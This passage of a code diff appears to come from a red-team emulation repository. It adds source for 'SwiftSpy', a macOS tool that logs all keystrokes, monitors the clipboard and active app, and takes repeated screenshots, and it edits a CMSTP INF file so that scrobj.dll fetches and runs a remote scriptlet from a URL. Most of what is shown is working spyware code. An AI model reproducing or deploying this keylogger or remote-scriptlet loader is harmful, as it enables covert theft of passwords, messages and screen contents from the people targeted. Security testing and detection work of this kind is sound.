+                print(keyMap[scancode]![0], terminator:"")
+                return
+            }
+            
+            // print shift up and return
+            if (scancode == 225 || scancode == 229)
+            {
+                print(keyMap[scancode]![0], terminator:"")
+                return
+            }
+            
+            // no capslock
+            if (capslock == false)
+            {
+                print(keyMap[scancode]![0], terminator:"")
+                
+            }
+            // capslock on
+            else if (capslock == true)
+            {
+                // only capitalize letters
+                if (scancode >= 4 && scancode <= 29)
+                {
+                    print(keyMap[scancode]![1], terminator:"")
+                }
+                else
+                {
+                    print(keyMap[scancode]![0], terminator:"")
+                }
+            }
+        }
+        else if((pressed == 0) && (scancode == 225 || scancode == 229))
+        {
+            print(keyMap[scancode]![1], terminator:"")
+        }
+    }
+    
+    // https://stackoverflow.com/questions/8676135/osx-hid-filter-for-secondary-keyboard
+    // https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/HID/new_api_10_5/tn2187.html
+    // https://stackoverflow.com/questions/48070396/how-to-get-list-of-hid-devices-in-a-swift-cocoa-application
+    func Keylog()
+    {
+        // Create HID Manager
+        let HIDManager = IOHIDManagerCreate(kCFAllocatorDefault, 0)
+        if (CFGetTypeID(HIDManager) != IOHIDManagerGetTypeID())
+         {
+             print("[-] Could not create HID manager")
+             exit(1);
+         }
+        else
+        {
+            print("[+] HID manager created!")
+        }
+        
+        // Setup device filtering,
+        func CreateDeviceMatchingDictionary( usagePage: Int, usage: Int) -> CFMutableDictionary {
+            let dict = [
+                kIOHIDDeviceUsageKey: usage,
+                kIOHIDDeviceUsagePageKey: usagePage
+                ] as NSDictionary
+
+            return dict.mutableCopy() as! NSMutableDictionary;
+        }
+        let keyboard = CreateDeviceMatchingDictionary(usagePage: kHIDPage_GenericDesktop, usage: kHIDUsage_GD_Keyboard)
+        IOHIDManagerSetDeviceMatching(HIDManager, keyboard)
+        
+        // Enumerate keyboard devices
+        let devices = IOHIDManagerCopyDevices(HIDManager)
+        if (devices != nil) {
+            print("[+] HID Devices enumerated:")
+            print(devices!)
+        }
+        else
+        {
+            print("[-] Could not find any devices")
+            exit(1);
+        }
+        
+        // Setup callback
+        let context = UnsafeMutableRawPointer(Unmanaged.passUnretained(self).toOpaque())
+        IOHIDManagerRegisterInputValueCallback(HIDManager, Handle_IOHIDInputValueCallback, context);
+        
+        // Open HID Manager
+        let ioreturn: IOReturn = IOHIDManagerOpen(HIDManager, IOOptionBits(kIOHIDOptionsTypeNone) )
+        if ioreturn != kIOReturnSuccess
+        {
+            print("[-] Could not open HID manager")
+            print("\nThis is likely because the application running this does not have Input Monitoring permissions.")
+            print("You can enable them in System Preferences > Security and Privacy > Input Monitoring.")
+            exit(1);
+        }
+        else
+        {
+            print("[+] HID manager opened!")
+        }
+                
+        // Start RunLoop
+        let calendar = Calendar.current
+        IOHIDManagerScheduleWithRunLoop(HIDManager, CFRunLoopGetCurrent(), CFRunLoopMode.defaultMode.rawValue)
+        RunLoop.current.run(until: calendar.date(byAdding: .second, value: 5, to: Date.now)!)
+        exit(0);
+    }
+    
+    // https://stackoverflow.com/questions/39691106/programmatically-screenshot-swift-3-macos/40864231#40864231
+    func Screenshot(folderName: String)
+    {
+         var displayCount: UInt32 = 0;
+         var result = CGGetActiveDisplayList(0, nil, &displayCount)
+         if (result != CGError.success) {
+             print("Error: \(result)")
+             return
+         }
+         let allocated = Int(displayCount)
+         let activeDisplays = UnsafeMutablePointer<CGDirectDisplayID>.allocate(capacity: allocated)
+         result = CGGetActiveDisplayList(displayCount, activeDisplays, &displayCount)
+         
+         if (result != CGError.success) {
+             print("Error: \(result)")
+             return
+         }
+            
+         for i in 1...displayCount {
+            let unixTimestamp = Date()
+            let fileUrl = URL(fileURLWithPath: folderName + "\(unixTimestamp)" + "_" + "\(i)" + ".jpg", isDirectory: true)
+            let screenShot:CGImage = CGDisplayCreateImage(activeDisplays[Int(i-1)])!
+            let bitmapRep = NSBitmapImageRep(cgImage: screenShot)
+            let jpegData = bitmapRep.representation(using: NSBitmapImageRep.FileType.jpeg, properties: [:])!
+             
+            do {
+                try jpegData.write(to: fileUrl, options: .atomic)
+            }
+            catch {print("Error: \(error)")}
+         }
+     }
+}
+
+func Help()
+{
+    print("SwiftSpy by @slyd0g")
+    print("Usage:")
+    print("-h || -help        | Print help menu")
+    print("-keylog            | Logs all keystrokes to stdout using IOHIDManager* APIs, requires 'Input Monitoring' permissions")
+    print("-clipboard         | Monitors for changes to the system clipboard and logs to stdout")
+    print("-allkeys           | Runs both the keylog and clipboard modules, requires 'Input Monitoring' permissions")
+    print("-screenshot /tmp   | Takes a screenshot of the user's screen and saves to the /tmp, requires 'Screen Recording` permissions")
+    print("-screenshot /tmp 5 | Takes a screenshot every 5 seconds and saves to /tmp, requires 'Screen Recording` permissions")
+}
+
+var swiftSpy = SwiftSpy()
+
+if CommandLine.arguments.count == 1
+{
+    Help()
+    exit(0)
+}
+else
+{
+    for argument in CommandLine.arguments
+    {
+        if (argument.contains("-h") || argument.contains("-help"))
+        {
+            Help()
+            exit(0)
+        }
+        else
+        {
+            if argument.contains("-keylog")
+            {
+                DispatchQueue.global(qos: .background).async {
+                    swiftSpy.Keylog()
+
+                }
+                swiftSpy.ActiveApp()
+            }
+            if argument.contains("-clipboard")
+            {
+                DispatchQueue.global(qos: .background).async {
+                    swiftSpy.ClipboardMonitor()
+
+                }
+                swiftSpy.ActiveApp()
+            }
+            if argument.contains("-allkeys")
+            {
+                DispatchQueue.global(qos: .background).async {
+                    swiftSpy.ClipboardMonitor()
+
+                }
+                DispatchQueue.global(qos: .background).async {
+                    swiftSpy.Keylog()
+
+                }
+                swiftSpy.ActiveApp()
+            }
+            if argument.contains("-screenshot")
+            {
+                var folder = CommandLine.arguments[2]
+                if (!folder.hasSuffix("/"))
+                {
+                    folder.append("/")
+                }
+
+                if CommandLine.arguments.count == 4
+                {
+                    let timer = UInt32(CommandLine.arguments[3])
+
+                    while(true)
+                    {
+                        swiftSpy.Screenshot(folderName: folder)
+                        sleep(timer!)
+                    }
+                }
+                else
+                {
+                    swiftSpy.Screenshot(folderName: folder)
+                }
+            }
+        }
+    }
+}

atomics/T1218.003/src/T1218.003.inf

@@ -8,7 +8,7 @@ AdvancedINF=2.5
 UnRegisterOCXs=UnRegisterOCXSection
 
 [UnRegisterOCXSection]
-%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1191/src/T1218.003.sct
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.003/src/T1218.003.sct
 
 [Strings]
 AppAct = "SOFTWARE\Microsoft\Connection Manager"

atomics/used_guids.txt

@@ -1066,3 +1066,4 @@ cd925593-fbb4-486d-8def-16cbdf944bf4
 123520cc-e998-471b-a920-bd28e3feafa0
 df1efab7-bc6d-4b88-8be9-91f55ae017aa
 29e0afca-8d1d-471a-8d34-25512fc48315
+aee3a097-4c5c-4fff-bbd3-0a705867ae29